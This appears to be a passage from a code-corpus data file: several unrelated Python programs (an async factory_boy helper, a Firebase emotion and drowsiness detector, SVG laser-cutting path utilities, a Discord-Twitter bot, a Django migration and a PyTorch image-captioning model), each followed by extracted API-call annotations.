'([-122.2727])\n', (592, 605), False, 'from itertools import cycle\n'), ((1420, 1456), 'numpy.arange', 'np.arange', (['(0)', '(2 * np.pi)', '(np.pi / 360)'], {}), '(0, 2 * np.pi, np.pi / 360)\n', (1429, 1456), True, 'import numpy as np\n')]
|
import asyncio
import inspect
import factory
class AsyncFactory(factory.Factory):
"""
Copied from
https://github.com/FactoryBoy/factory_boy/issues/679#issuecomment-673960170
"""
class Meta:
abstract = True
@classmethod
def _create(cls, model_class, *args, **kwargs):
async def maker_coroutine():
for key, value in kwargs.items():
# when using SubFactory, you'll have a Task in the corresponding kwarg
# await tasks to pass model instances instead
if inspect.isawaitable(value):
kwargs[key] = await value
# replace as needed by your way of creating model instances
document = model_class(*args, **kwargs)
await document.commit()
return document
# A Task can be awaited multiple times, unlike a coroutine.
# useful when a factory and a subfactory must share a same object
return asyncio.create_task(maker_coroutine())
@classmethod
async def create_batch(cls, size, **kwargs):
return [await cls.create(**kwargs) for _ in range(size)]
class BaseFactory(factory.Factory):
class Meta:
abstract = True
|
[
"inspect.isawaitable"
] |
[((559, 585), 'inspect.isawaitable', 'inspect.isawaitable', (['value'], {}), '(value)\n', (578, 585), False, 'import inspect\n')]
|
import os
import cv2
import time
import imutils
import pyrebase
import numpy as np
from utils import *
import sys
import dlib
from skimage import io
#################### Initialize ####################
print("Start initializing")
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
emotion_dict = {0: "Angry", 1: "Disgusted", 2: "Fearful",
3: "Happy", 4: "Neutral", 5: "Sad", 6: "Surprised"}
firebase = init_firebase()
storage = firebase.storage()
db = firebase.database()
model, facecasc = init_model()
history_list = []
loop = 0
predictor_path = "./shape_predictor_68_face_landmarks.dat"
detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor(predictor_path)
reset_counter = 0
#################### Initialize ####################
print("Start looping")
data = {'cur_emotion': "None"}
db.child("CUR_EMOTION").set(data)
while(1):
print("Loop ======================================================================", loop)
files = storage.list_files()
reset_counter += 1
for file in files:
if (file.name)[0] == "s" and file.name != "screenShot/":
if file.name not in history_list:
reset_counter = 0
history_list.append(file.name)
img_local_name = "imgs/" + os.path.basename(file.name) + ".png"
print(img_local_name)
storage.child(file.name).download(img_local_name)
gray_img = cv2.imread(
img_local_name, cv2.IMREAD_GRAYSCALE)
img = cv2.imread(img_local_name)
dets = detector(img, 1)
vec = np.empty([68, 2], dtype=int)
status = "Not Sleeping"
for k, d in enumerate(dets):
shape = predictor(img, d)
for b in range(68):
vec[b][0] = shape.part(b).x
vec[b][1] = shape.part(b).y
right_ear = compute_EAR(vec[42:48])
left_ear = compute_EAR(vec[36:42])
if (right_ear+left_ear)/2 < 0.2:
status = "sleeping"
print(status)
faces = facecasc.detectMultiScale(
gray_img, scaleFactor=1.3, minNeighbors=5)
for (x, y, w, h) in faces:
print("Detect Face")
roi_gray = gray_img[y:y + h, x:x + w]
cropped_img = np.expand_dims(np.expand_dims(
cv2.resize(roi_gray, (48, 48)), -1), 0)
prediction = model.predict(cropped_img)
maxindex = int(np.argmax(prediction))
if maxindex == 0 or maxindex == 1 or maxindex == 2 or maxindex == 4:
maxindex = 5
print(emotion_dict[maxindex])
if status == "sleeping":
data = {'cur_emotion': "sleeping"}
else:
data = {'cur_emotion': emotion_dict[maxindex]}
db.child("CUR_EMOTION").set(data)
if reset_counter >= 100:
reset_counter = 0
data = {'cur_emotion': "None"}
db.child("CUR_EMOTION").set(data)
loop += 1
# time.sleep(1))
|
[
"os.path.basename",
"numpy.argmax",
"numpy.empty",
"cv2.imread",
"dlib.get_frontal_face_detector",
"dlib.shape_predictor",
"cv2.resize"
] |
[((616, 648), 'dlib.get_frontal_face_detector', 'dlib.get_frontal_face_detector', ([], {}), '()\n', (646, 648), False, 'import dlib\n'), ((661, 697), 'dlib.shape_predictor', 'dlib.shape_predictor', (['predictor_path'], {}), '(predictor_path)\n', (681, 697), False, 'import dlib\n'), ((1460, 1508), 'cv2.imread', 'cv2.imread', (['img_local_name', 'cv2.IMREAD_GRAYSCALE'], {}), '(img_local_name, cv2.IMREAD_GRAYSCALE)\n', (1470, 1508), False, 'import cv2\n'), ((1552, 1578), 'cv2.imread', 'cv2.imread', (['img_local_name'], {}), '(img_local_name)\n', (1562, 1578), False, 'import cv2\n'), ((1642, 1670), 'numpy.empty', 'np.empty', (['[68, 2]'], {'dtype': 'int'}), '([68, 2], dtype=int)\n', (1650, 1670), True, 'import numpy as np\n'), ((1289, 1316), 'os.path.basename', 'os.path.basename', (['file.name'], {}), '(file.name)\n', (1305, 1316), False, 'import os\n'), ((2678, 2699), 'numpy.argmax', 'np.argmax', (['prediction'], {}), '(prediction)\n', (2687, 2699), True, 'import numpy as np\n'), ((2542, 2572), 'cv2.resize', 'cv2.resize', (['roi_gray', '(48, 48)'], {}), '(roi_gray, (48, 48))\n', (2552, 2572), False, 'import cv2\n')]
|
# laser_path_utils.py
"""Utility functions for working with paths for laser cutting"""
import numpy as np
import svgpathtools.svgpathtools as SVGPT
# it's imporatant to clone and install the repo manually. The pip/pypi version is outdated
from laser_svg_utils import tree_to_tempfile
from laser_clipper import point_on_loops, point_inside_loop
def tempfile_to_paths(temp_svg):
"""open temp SVG file and return a path"""
# temp_svg.seek(0)
paths, attributes = SVGPT.svg2paths(temp_svg.name)
temp_svg.close()
return (paths, attributes)
def tree_to_paths(tree):
"""turns an svg tree into paths list"""
temp_svg = tree_to_tempfile(tree)
paths, _ = tempfile_to_paths(temp_svg)
svg_paths = []
for path in paths:
if not path:
svg_paths.append(path.d())
return svg_paths
def paths_to_loops(paths):
""""Convert a list of paths to a list of points"""
point_loop_list = []
for path_string in paths:
points = path_string_to_points(path_string)
if points is not None:
point_loop_list.append(points)
return point_loop_list
def combine_paths(paths, as_list=True):
"""combines path strings into a single string"""
combined = ""
first = True
for path in paths:
if not first:
combined += " "
combined += path
first = False
if as_list:
return [combined]
else:
return combined
def path_string_to_points(path_string):
"""Convert path string into a list of points"""
path = SVGPT.parse_path(path_string)
empty = SVGPT.Path()
if path == empty:
return None
points = []
for segment in path:
segment_points = subpath_to_points(segment)
for point in segment_points:
if points == [] or point != points[-1]:
points.append(point)
return points
def subpath_to_points(segment):
"""Converts a path segment into a list of points"""
points = []
if isinstance(segment, SVGPT.path.Line): # pylint: disable=maybe-no-member
points = points_from_line(segment)
else:
points = points_from_curve(segment)
return points
def get_start(path_string):
"""returns start point (x, y) of a path string"""
path = SVGPT.parse_path(path_string)
start_xy = complex_to_xy(path.start)
return start_xy
def points_from_line(line):
"""returns endpoints of line"""
points_list = []
start = line.point(0)
end = line.point(1)
points_list.append(complex_to_xy(start))
points_list.append(complex_to_xy(end))
return points_list
def points_from_curve(curve, samples=20):
"""returns poins along a curve"""
points_list = []
for location in range(samples):
fraction = location / (samples-1)
point_on_curve = curve.point(fraction)
points_list.append(complex_to_xy(point_on_curve))
return points_list
def complex_to_xy(complex_point):
"""turns complex point (x+yj) into cartesian point [x,y]"""
xy_point = [complex_point.real, complex_point.imag]
return xy_point
def xy_to_complex(xy_point):
"""turns cartesian point [x,y] into complex point (x+yj)"""
complex_point = xy_point[0] + xy_point[1] * 1j
return complex_point
def loops_to_paths(loops):
"""turns a list of point loops into a list of path strings"""
paths = []
for loop in loops:
path = points_to_path(loop)
paths.append(path)
return paths
def points_to_path(points, closed=True):
"""turn a series of points into a path"""
first = True
data = "M "
for point in points:
if not first:
data += " L "
data += f"{point[0]},{point[1]}"
first = False
if closed:
data += " Z"
return data
def scale_path(path_string, scale):
"""scales a path string by a scale factor (float)"""
path = SVGPT.parse_path(path_string)
scaled_path = path.scaled(scale)
new_path_string = scaled_path.d()
return new_path_string
def move_path(path_string, xy_translation):
"""Takes a path string and xy_translation (x, y), and moves it x units over, and y units down"""
path = SVGPT.parse_path(path_string)
empty = SVGPT.Path()
if path == empty:
return ""
complex_translation = xy_to_complex(xy_translation)
translated_path = path.translated(complex_translation)
translated_string = translated_path.d()
return translated_string
def get_angle(path_string):
"""measures the angle in degrees (CCW) from the path positive X axis (0,0), (0,1)"""
path = SVGPT.parse_path(path_string)
vector = path.point(1) - path.point(0)
angle = np.angle(vector, deg=True)
return angle
def rotate_path(path_string, angle_degrees, xy_point):
"""rotates a path string a given number of degrees (CCW) around point (x, y)"""
path = SVGPT.parse_path(path_string)
empty = SVGPT.Path()
if path == empty:
return ""
complex_point = xy_to_complex(xy_point)
rotated_path = path.rotated(angle_degrees, origin=complex_point)
rotated_string = rotated_path.d()
return rotated_string
def get_length(path_string):
"""returns the length of a path string"""
path = SVGPT.parse_path(path_string)
return path.length()
def get_all_segments(loops):
"""returns all of the segments from all of the loops"""
all_segments = []
for loop in loops:
loop_segments = get_loop_segments(loop)
all_segments = all_segments + loop_segments
return all_segments
def segments_overlap(first, second):
"""returns true if segments share more than a single point"""
first_path_string = points_to_path(first, closed=False)
second_path_string = points_to_path(second, closed=False)
first_path = SVGPT.parse_path(first_path_string)[0]
second_path = SVGPT.parse_path(second_path_string)[0]
overlaps = []
for point in first:
complex_point = xy_to_complex(point)
place_on_path = second_path.point_to_t(complex_point)
if place_on_path is not None:
if point not in overlaps:
overlaps.append(point)
for point in second:
complex_point = xy_to_complex(point)
place_on_path = first_path.point_to_t(complex_point)
if place_on_path is not None:
if point not in overlaps:
overlaps.append(point)
overlap = len(overlaps) >= 2
return overlap
def get_loop_segments(loop):
"""returns a list of segments in a loop"""
segments = []
last_point = None
for this_point in loop:
if last_point is not None:
new_segment = [last_point, this_point]
segments.append(new_segment)
last_point = this_point
return segments
def segments_to_paths(segments):
"""converts list of segments into list of paths"""
paths = []
for segment in segments:
new_path = points_to_path(segment, closed=False)
paths.append(new_path)
return paths
def get_not_overlapping(first, second):
"""returns the segments of the first path that do not overlap with the second."""
output_paths = []
first_loops = paths_to_loops(first)
second_loops = paths_to_loops(second)
for loop in first_loops:
not_overlapping = ""
segment_started = False
last_point = loop[-1]
for point in loop:
if not point_on_loops(point, second_loops):
if not segment_started:
not_overlapping += f" M {last_point[0]},{last_point[1]}"
segment_started = True
if last_point != point:
not_overlapping += f" L {point[0]},{point[1]}"
else: # close the path
if segment_started:
not_overlapping += f" L {point[0]},{point[1]}"
output_paths.append(not_overlapping)
segment_started = False
not_overlapping = ""
last_point = point
if segment_started:
output_paths.append(not_overlapping)
return output_paths
def get_overlapping(first, second):
"""returns the overlapping segments of the first and second path."""
output_paths = []
first_loops = paths_to_loops(first)
second_loops = paths_to_loops(second)
for loop in first_loops:
overlapping = ""
segment_started = False
for point in loop:
if point_on_loops(point, second_loops):
if not segment_started:
overlapping += f" M {point[0]},{point[1]}"
segment_started = True
else:
overlapping += f" L {point[0]},{point[1]}"
else: # skip other points
if segment_started:
output_paths.append(overlapping)
overlapping = ""
segment_started = False
if segment_started:
output_paths.append(overlapping)
return output_paths
def divide_pathstring_parts(pathstring):
"""breaks single path string into substrings at each 'M' returning a list of path strings"""
substring = pathstring.strip()
paths = []
while 'M' in substring[1:]:
m_index = substring.find('M', 1)
if m_index > -1:
subpath = substring[0:m_index].strip()
paths.append(subpath)
substring = substring[m_index:].strip()
paths.append(substring)
return paths
# TODO: split open/closed separation into smaller chunks
def separate_closed_paths(paths):
"""takes a list of path strings
breaks non continuous paths and
joins connecting paths together
to return a list of closed paths """
discrete_paths = []
closed_paths = []
open_paths = []
dead_ends = []
for path in paths:
discrete_paths += divide_pathstring_parts(path)
for path in discrete_paths:
parsed_path = SVGPT.parse_path(path)
if parsed_path.isclosed():
closed_paths.append(path)
else:
open_paths.append(parsed_path)
while open_paths:
path = open_paths.pop()
new_path = None
for other_path in open_paths:
if path.end == other_path.start:
new_path = path.d() + " " + other_path.d().replace('M', 'L')
open_paths.remove(other_path)
break
elif path.start == other_path.end:
new_path = other_path.d() + " " + path.d().replace('M', 'L')
open_paths.remove(other_path)
break
elif path.end == other_path.end:
new_path = path.d() + " " + other_path.reversed().d().replace('M', 'L')
open_paths.remove(other_path)
break
elif path.start == other_path.start:
new_path = path.reversed().d() + " " + other_path.d().replace('M', 'L')
open_paths.remove(other_path)
break
if new_path is not None:
parsed_new_path = SVGPT.parse_path(new_path)
if parsed_new_path.isclosed():
closed_paths.append(new_path)
else:
open_paths.append(parsed_new_path)
else:
dead_ends.append(path.d())
open_paths = dead_ends
return closed_paths, open_paths
def is_inside(path, other_path):
"""checks if path is inside other_path and returns true or false"""
loop = paths_to_loops([path])[0]
other_loop = paths_to_loops([other_path])[0]
for point in loop:
if point_inside_loop(point, other_loop) == 1:
return True
return False
def path_to_segments(path_string):
"""breaks down a path into a list of segments"""
segments = []
path = SVGPT.parse_path(path_string)
for segment in path:
if isinstance(segment, SVGPT.path.Line): # pylint: disable=maybe-no-member
points = points_from_line(segment)
new_path_string = f"M {points[0][0]} {points[0][1]} L {points[1][0]} {points[1][1]}"
segments.append(new_path_string)
return segments
|
[
"svgpathtools.svgpathtools.svg2paths",
"numpy.angle",
"svgpathtools.svgpathtools.parse_path",
"laser_svg_utils.tree_to_tempfile",
"laser_clipper.point_on_loops",
"laser_clipper.point_inside_loop",
"svgpathtools.svgpathtools.Path"
] |
[((476, 506), 'svgpathtools.svgpathtools.svg2paths', 'SVGPT.svg2paths', (['temp_svg.name'], {}), '(temp_svg.name)\n', (491, 506), True, 'import svgpathtools.svgpathtools as SVGPT\n'), ((645, 667), 'laser_svg_utils.tree_to_tempfile', 'tree_to_tempfile', (['tree'], {}), '(tree)\n', (661, 667), False, 'from laser_svg_utils import tree_to_tempfile\n'), ((1558, 1587), 'svgpathtools.svgpathtools.parse_path', 'SVGPT.parse_path', (['path_string'], {}), '(path_string)\n', (1574, 1587), True, 'import svgpathtools.svgpathtools as SVGPT\n'), ((1601, 1613), 'svgpathtools.svgpathtools.Path', 'SVGPT.Path', ([], {}), '()\n', (1611, 1613), True, 'import svgpathtools.svgpathtools as SVGPT\n'), ((2289, 2318), 'svgpathtools.svgpathtools.parse_path', 'SVGPT.parse_path', (['path_string'], {}), '(path_string)\n', (2305, 2318), True, 'import svgpathtools.svgpathtools as SVGPT\n'), ((3913, 3942), 'svgpathtools.svgpathtools.parse_path', 'SVGPT.parse_path', (['path_string'], {}), '(path_string)\n', (3929, 3942), True, 'import svgpathtools.svgpathtools as SVGPT\n'), ((4204, 4233), 'svgpathtools.svgpathtools.parse_path', 'SVGPT.parse_path', (['path_string'], {}), '(path_string)\n', (4220, 4233), True, 'import svgpathtools.svgpathtools as SVGPT\n'), ((4247, 4259), 'svgpathtools.svgpathtools.Path', 'SVGPT.Path', ([], {}), '()\n', (4257, 4259), True, 'import svgpathtools.svgpathtools as SVGPT\n'), ((4619, 4648), 'svgpathtools.svgpathtools.parse_path', 'SVGPT.parse_path', (['path_string'], {}), '(path_string)\n', (4635, 4648), True, 'import svgpathtools.svgpathtools as SVGPT\n'), ((4704, 4730), 'numpy.angle', 'np.angle', (['vector'], {'deg': '(True)'}), '(vector, deg=True)\n', (4712, 4730), True, 'import numpy as np\n'), ((4900, 4929), 'svgpathtools.svgpathtools.parse_path', 'SVGPT.parse_path', (['path_string'], {}), '(path_string)\n', (4916, 4929), True, 'import svgpathtools.svgpathtools as SVGPT\n'), ((4943, 4955), 'svgpathtools.svgpathtools.Path', 'SVGPT.Path', ([], {}), '()\n', (4953, 4955), True, 'import svgpathtools.svgpathtools as SVGPT\n'), ((5262, 5291), 'svgpathtools.svgpathtools.parse_path', 'SVGPT.parse_path', (['path_string'], {}), '(path_string)\n', (5278, 5291), True, 'import svgpathtools.svgpathtools as SVGPT\n'), ((11861, 11890), 'svgpathtools.svgpathtools.parse_path', 'SVGPT.parse_path', (['path_string'], {}), '(path_string)\n', (11877, 11890), True, 'import svgpathtools.svgpathtools as SVGPT\n'), ((5821, 5856), 'svgpathtools.svgpathtools.parse_path', 'SVGPT.parse_path', (['first_path_string'], {}), '(first_path_string)\n', (5837, 5856), True, 'import svgpathtools.svgpathtools as SVGPT\n'), ((5878, 5914), 'svgpathtools.svgpathtools.parse_path', 'SVGPT.parse_path', (['second_path_string'], {}), '(second_path_string)\n', (5894, 5914), True, 'import svgpathtools.svgpathtools as SVGPT\n'), ((10009, 10031), 'svgpathtools.svgpathtools.parse_path', 'SVGPT.parse_path', (['path'], {}), '(path)\n', (10025, 10031), True, 'import svgpathtools.svgpathtools as SVGPT\n'), ((8505, 8540), 'laser_clipper.point_on_loops', 'point_on_loops', (['point', 'second_loops'], {}), '(point, second_loops)\n', (8519, 8540), False, 'from laser_clipper import point_on_loops, point_inside_loop\n'), ((11129, 11155), 'svgpathtools.svgpathtools.parse_path', 'SVGPT.parse_path', (['new_path'], {}), '(new_path)\n', (11145, 11155), True, 'import svgpathtools.svgpathtools as SVGPT\n'), ((11658, 11694), 'laser_clipper.point_inside_loop', 'point_inside_loop', (['point', 'other_loop'], {}), '(point, other_loop)\n', (11675, 11694), False, 'from laser_clipper import point_on_loops, point_inside_loop\n'), ((7444, 7479), 'laser_clipper.point_on_loops', 'point_on_loops', (['point', 'second_loops'], {}), '(point, second_loops)\n', (7458, 7479), False, 'from laser_clipper import point_on_loops, point_inside_loop\n')]
|
import discord
import os
import requests,json
import tweepy
consumer_key=os.getenv('C_K')
consumer_secret=os.getenv('C_S')
access_token=os.getenv('A_T')
access_token_secret=os.getenv('A_S')
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth)
r = requests.get('https://api.github.com/user', auth=('user', 'pass'))
print(r.json())
print(r.status_code)
client = discord.Client()
@client.event
async def on_ready():
print('hello, I\'m {0.user}'.format(client))
@client.event
async def on_message(msg):
if msg.author==client.user:
return
if msg:
print(msg)
await msg.channel.send('hey {}'.format(msg.author.name))
tweets = api.search(msg.content,lang='en',result_type='recent',include_entities="mashable")
for tweet in tweets:
if not tweet.text.startswith('RT'):
await msg.channel.send(tweet.user.screen_name+' : \n'+tweet.text)
client.run(os.getenv('TOKEN'))
|
[
"tweepy.API",
"requests.get",
"tweepy.OAuthHandler",
"os.getenv",
"discord.Client"
] |
[((75, 91), 'os.getenv', 'os.getenv', (['"""C_K"""'], {}), "('C_K')\n", (84, 91), False, 'import os\n'), ((108, 124), 'os.getenv', 'os.getenv', (['"""C_S"""'], {}), "('C_S')\n", (117, 124), False, 'import os\n'), ((138, 154), 'os.getenv', 'os.getenv', (['"""A_T"""'], {}), "('A_T')\n", (147, 154), False, 'import os\n'), ((175, 191), 'os.getenv', 'os.getenv', (['"""A_S"""'], {}), "('A_S')\n", (184, 191), False, 'import os\n'), ((199, 249), 'tweepy.OAuthHandler', 'tweepy.OAuthHandler', (['consumer_key', 'consumer_secret'], {}), '(consumer_key, consumer_secret)\n', (218, 249), False, 'import tweepy\n'), ((314, 330), 'tweepy.API', 'tweepy.API', (['auth'], {}), '(auth)\n', (324, 330), False, 'import tweepy\n'), ((336, 402), 'requests.get', 'requests.get', (['"""https://api.github.com/user"""'], {'auth': "('user', 'pass')"}), "('https://api.github.com/user', auth=('user', 'pass'))\n", (348, 402), False, 'import requests, json\n'), ((449, 465), 'discord.Client', 'discord.Client', ([], {}), '()\n', (463, 465), False, 'import discord\n'), ((980, 998), 'os.getenv', 'os.getenv', (['"""TOKEN"""'], {}), "('TOKEN')\n", (989, 998), False, 'import os\n')]
|
# Generated by Django 2.0.7 on 2019-05-08 12:22
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('app_warehouse', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='cargoin',
name='reason',
field=models.CharField(default='default', max_length=20, verbose_name='ๅ
ฅๅบๅๅ '),
),
migrations.AddField(
model_name='cargoin',
name='shelflife',
field=models.IntegerField(blank=True, default=72, null=True, verbose_name='ไฟ่ดจๆ'),
),
migrations.AddField(
model_name='cargoout',
name='reason',
field=models.CharField(default='default', max_length=20, verbose_name='ๅบๅบๅๅ '),
),
migrations.AlterField(
model_name='cargoin',
name='goods',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='cargoin_by_goods', to='app_goods.Goods'),
),
migrations.AlterField(
model_name='cargoin',
name='staletime',
field=models.DateTimeField(blank=True, null=True, verbose_name='่ฟๆๆถ้ด'),
),
migrations.AlterField(
model_name='cargoin',
name='warehouse',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='cargoin_by_warehouse', to='app_warehouse.Warehouse'),
),
migrations.AlterField(
model_name='cargoout',
name='goods',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='cargoout_by_goods', to='app_goods.Goods'),
),
migrations.AlterField(
model_name='cargoout',
name='order',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='cargoout_by_order', to='app_order.Order'),
),
migrations.AlterField(
model_name='cargoout',
name='warehouse',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='cargoout_by_warehouse', to='app_warehouse.Warehouse'),
),
]
|
[
"django.db.models.CharField",
"django.db.models.IntegerField",
"django.db.models.DateTimeField",
"django.db.models.ForeignKey"
] |
[((363, 434), 'django.db.models.CharField', 'models.CharField', ([], {'default': '"""default"""', 'max_length': '(20)', 'verbose_name': '"""ๅ
ฅๅบๅๅ """'}), "(default='default', max_length=20, verbose_name='ๅ
ฅๅบๅๅ ')\n", (379, 434), False, 'from django.db import migrations, models\n'), ((558, 632), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'blank': '(True)', 'default': '(72)', 'null': '(True)', 'verbose_name': '"""ไฟ่ดจๆ"""'}), "(blank=True, default=72, null=True, verbose_name='ไฟ่ดจๆ')\n", (577, 632), False, 'from django.db import migrations, models\n'), ((754, 825), 'django.db.models.CharField', 'models.CharField', ([], {'default': '"""default"""', 'max_length': '(20)', 'verbose_name': '"""ๅบๅบๅๅ """'}), "(default='default', max_length=20, verbose_name='ๅบๅบๅๅ ')\n", (770, 825), False, 'from django.db import migrations, models\n'), ((947, 1095), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'blank': '(True)', 'null': '(True)', 'on_delete': 'django.db.models.deletion.DO_NOTHING', 'related_name': '"""cargoin_by_goods"""', 'to': '"""app_goods.Goods"""'}), "(blank=True, null=True, on_delete=django.db.models.\n deletion.DO_NOTHING, related_name='cargoin_by_goods', to='app_goods.Goods')\n", (964, 1095), False, 'from django.db import migrations, models\n'), ((1216, 1280), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'blank': '(True)', 'null': '(True)', 'verbose_name': '"""่ฟๆๆถ้ด"""'}), "(blank=True, null=True, verbose_name='่ฟๆๆถ้ด')\n", (1236, 1280), False, 'from django.db import migrations, models\n'), ((1406, 1571), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'blank': '(True)', 'null': '(True)', 'on_delete': 'django.db.models.deletion.DO_NOTHING', 'related_name': '"""cargoin_by_warehouse"""', 'to': '"""app_warehouse.Warehouse"""'}), "(blank=True, null=True, on_delete=django.db.models.\n deletion.DO_NOTHING, related_name='cargoin_by_warehouse', to=\n 'app_warehouse.Warehouse')\n", (1423, 1571), False, 'from django.db import migrations, models\n'), ((1684, 1838), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'blank': '(True)', 'null': '(True)', 'on_delete': 'django.db.models.deletion.DO_NOTHING', 'related_name': '"""cargoout_by_goods"""', 'to': '"""app_goods.Goods"""'}), "(blank=True, null=True, on_delete=django.db.models.\n deletion.DO_NOTHING, related_name='cargoout_by_goods', to='app_goods.Goods'\n )\n", (1701, 1838), False, 'from django.db import migrations, models\n'), ((1951, 2105), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'blank': '(True)', 'null': '(True)', 'on_delete': 'django.db.models.deletion.DO_NOTHING', 'related_name': '"""cargoout_by_order"""', 'to': '"""app_order.Order"""'}), "(blank=True, null=True, on_delete=django.db.models.\n deletion.DO_NOTHING, related_name='cargoout_by_order', to='app_order.Order'\n )\n", (1968, 2105), False, 'from django.db import migrations, models\n'), ((2222, 2388), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'blank': '(True)', 'null': '(True)', 'on_delete': 'django.db.models.deletion.DO_NOTHING', 'related_name': '"""cargoout_by_warehouse"""', 'to': '"""app_warehouse.Warehouse"""'}), "(blank=True, null=True, on_delete=django.db.models.\n deletion.DO_NOTHING, related_name='cargoout_by_warehouse', to=\n 'app_warehouse.Warehouse')\n", (2239, 2388), False, 'from django.db import migrations, models\n')]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2021-10-21
# @Author : iamwm
from amp.broker.store import Store
class Exchange:
"""
exchange of broker
"""
def __init__(self, name: str) -> None:
self.name = name
self.topic_manager = Store(Topic)
def bind_topic(self, topic_name: str):
self.topic_manager.get(topic_name)
EManager = Store(Exchange)
class Topic:
"""
topic of exchange
"""
def __init__(self, name: str) -> None:
self.name = name
|
[
"amp.broker.store.Store"
] |
[((393, 408), 'amp.broker.store.Store', 'Store', (['Exchange'], {}), '(Exchange)\n', (398, 408), False, 'from amp.broker.store import Store\n'), ((280, 292), 'amp.broker.store.Store', 'Store', (['Topic'], {}), '(Topic)\n', (285, 292), False, 'from amp.broker.store import Store\n')]
|
# Copyright 2020 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import torch
import torch.nn as nn
import torchvision.models as models
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
#device = torch.device("cpu")
class EncoderCNN(nn.Module):
def __init__(self, embed_size):
super(EncoderCNN, self).__init__()
resnet = models.resnet50(pretrained=True)
for param in resnet.parameters():
param.requires_grad_(False)
modules = list(resnet.children())[:-1]
self.resnet = nn.Sequential(*modules)
self.embed = nn.Linear(resnet.fc.in_features, embed_size)
def forward(self, images):
features = self.resnet(images)
features = features.view(features.size(0), -1)
features = self.embed(features)
return features
class DecoderRNN(nn.Module):
def __init__(self, embed_size, hidden_size, vocab_size, num_layers=1, drop=0.5):
super(DecoderRNN, self).__init__()
# Set the hidden size for init_hidden
self.hidden_size = hidden_size
self.num_layers = num_layers
# Set the device
self.device = device
# Embedded layer
self.embed = nn.Embedding(vocab_size, embed_size)
# LSTM layer
self.lstm = nn.LSTM(input_size=embed_size,
hidden_size=hidden_size,
num_layers=num_layers,
batch_first= True,
dropout = drop)
# Dropout Layer
self.drop = nn.Dropout(p=drop)
# Fully Connected layer
self.fc = nn.Linear(hidden_size, vocab_size)
def init_hidden(self, batch_size):
return (torch.zeros(self.num_layers, batch_size, self.hidden_size, device = device),
torch.zeros(self.num_layers, batch_size, self.hidden_size, device = device))
def forward(self, features, hidden):
# LSTM
lstm_out, hidden = self.lstm(features, hidden)
# Functional component
out = self.fc(lstm_out)
out = out.squeeze(1)
out = out.argmax(dim=1)
features = self.embed(out.unsqueeze(0))
# # Embedding the captions
# embedded = self.embed(captions)
# # print(embedded.shape)
# # print(features.unsqueeze(1).shape)
# # print(embedded.shape)
# embedded = torch.cat((features.unsqueeze(1), embedded), dim=1)
# # LSTM
# lstm_out, hidden = self.lstm(features, hidden)
# # Functional component
# out = self.fc(lstm_out)
return out, features, hidden
def sample(self, inputs, states=None, max_len=20):
" accepts pre-processed image tensor (inputs) and returns predicted sentence (list of tensor ids of length max_len) "
# Initialize the hidden state
hidden = self.init_hidden(inputs.shape[0])# features is of shape (batch_size, embed_size)
out_list = list()
word_len = 0
with torch.no_grad():
while word_len < max_len:
lstm_out, hidden = self.lstm(inputs, hidden)
out = self.fc(lstm_out)
#print(out.shape)
out = out.squeeze(1)
out = out.argmax(dim=1)
out_list.append(out.item())
inputs = self.embed(out.unsqueeze(0))
word_len += 1
if out == 1:
break
return out_list
|
[
"torch.nn.Dropout",
"torch.nn.Sequential",
"torch.nn.Embedding",
"torchvision.models.resnet50",
"torch.cuda.is_available",
"torch.nn.Linear",
"torch.zeros",
"torch.nn.LSTM",
"torch.no_grad"
] |
[((689, 714), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (712, 714), False, 'import torch\n'), ((883, 915), 'torchvision.models.resnet50', 'models.resnet50', ([], {'pretrained': '(True)'}), '(pretrained=True)\n', (898, 915), True, 'import torchvision.models as models\n'), ((1076, 1099), 'torch.nn.Sequential', 'nn.Sequential', (['*modules'], {}), '(*modules)\n', (1089, 1099), True, 'import torch.nn as nn\n'), ((1121, 1165), 'torch.nn.Linear', 'nn.Linear', (['resnet.fc.in_features', 'embed_size'], {}), '(resnet.fc.in_features, embed_size)\n', (1130, 1165), True, 'import torch.nn as nn\n'), ((1768, 1804), 'torch.nn.Embedding', 'nn.Embedding', (['vocab_size', 'embed_size'], {}), '(vocab_size, embed_size)\n', (1780, 1804), True, 'import torch.nn as nn\n'), ((1855, 1970), 'torch.nn.LSTM', 'nn.LSTM', ([], {'input_size': 'embed_size', 'hidden_size': 'hidden_size', 'num_layers': 'num_layers', 'batch_first': '(True)', 'dropout': 'drop'}), '(input_size=embed_size, hidden_size=hidden_size, num_layers=\n num_layers, batch_first=True, dropout=drop)\n', (1862, 1970), True, 'import torch.nn as nn\n'), ((2134, 2152), 'torch.nn.Dropout', 'nn.Dropout', ([], {'p': 'drop'}), '(p=drop)\n', (2144, 2152), True, 'import torch.nn as nn\n'), ((2212, 2246), 'torch.nn.Linear', 'nn.Linear', (['hidden_size', 'vocab_size'], {}), '(hidden_size, vocab_size)\n', 